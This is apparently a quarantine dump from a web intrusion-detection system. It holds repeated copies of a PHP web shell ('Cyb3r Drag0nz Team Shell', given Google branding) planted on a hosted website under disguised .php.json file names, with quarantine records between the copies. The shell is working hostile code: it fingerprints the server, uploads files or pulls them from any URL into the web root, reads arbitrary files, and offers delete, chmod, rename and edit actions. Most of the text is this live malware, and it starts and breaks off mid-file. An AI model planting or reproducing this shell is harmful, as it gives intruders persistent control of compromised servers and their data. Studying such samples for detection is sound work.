<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5214",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:language/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/language/f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353230,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "language/f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/logs/f46vc3nzn1qw.php.json
Normal file
320
var/www/hosting/archlinexp.eu/www/logs/f46vc3nzn1qw.php.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5305",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:logs/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/logs/f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353220,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "logs/f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/logs/yhajxaav.php.json
Normal file
320
var/www/hosting/archlinexp.eu/www/logs/yhajxaav.php.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
